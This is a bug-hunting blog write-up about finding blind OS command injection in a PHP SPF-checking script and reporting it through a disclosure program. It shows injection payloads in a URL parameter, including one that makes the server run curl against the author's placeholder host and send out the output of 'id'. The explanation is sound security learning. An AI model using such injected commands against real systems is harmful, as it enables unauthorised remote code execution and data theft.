Blind OS command injection

Author: bergee (Bergee's Stories on Bug Hunting)
Published: 2022-08-21 (last modified 2022-09-07)
URL: https://bergee.it/blog/blind-command-injection/
Categories: Uncategorized, vdp, write-up

Hi dear readers. This story is about how I found a command injection that led to RCE and earned a "Thank you" in return :).

I was hunting on a target I had found via a Google dork. It had a feature that checked the SPF records of a given domain. To clarify, a Sender Policy Framework (SPF) record is a DNS TXT record that lists the servers authorized to send e-mail on behalf of a particular domain; you can read more about it at https://www.cloudflare.com/learning/dns/dns-records/dns-spf-record/. So I started Burp and examined the request responsible for checking the domain. This was the request:

    GET /script.php?domain=mydomain.com

Simple as that. I wondered whether the script ran an external shell command such as host or dig with the given domain as its argument, so I tried a few command injection payloads:

    GET /script.php?domain=mydomain.com;id

    GET /script.php?domain=mydomain.com id

But the response contained no command output, only PHP errors. After some more trial and error, I decided to test for blind command injection: what if the command is actually executed on the backend, but its output is never printed? I checked this with a curl command that connected back to my own server, adding an "a" parameter with the value $(id) to the GET request. This way the output of the id command was sent by curl, as the value of parameter "a", to my server listening at 1.2.3.4 on port 8888. So the final request was:

    GET /script.php?domain=mydomain.com;curl%201.2.3.4:8888?a=$(id)

Yes, I also used the google.com domain for testing, as Google is good for everything 🙂

[Screenshot: the Burp request (redacted)]

Bingo! This is what I saw in the response:

[Screenshot: the confirmed RCE (redacted)]

This was blind command injection, as the command output was never shown in the response. Lesson learned: even if the script returns errors and there is no command output in the response, that does not mean the command is not being executed. This bug gives us RCE (remote command execution), so it is game over :). Although this was a VDP program that promised some token of appreciation for serious bugs (and I think RCE is serious enough), all I got in return was a "Thank you" e-mail. However, knowledge is always priceless.

See you next bug 🙂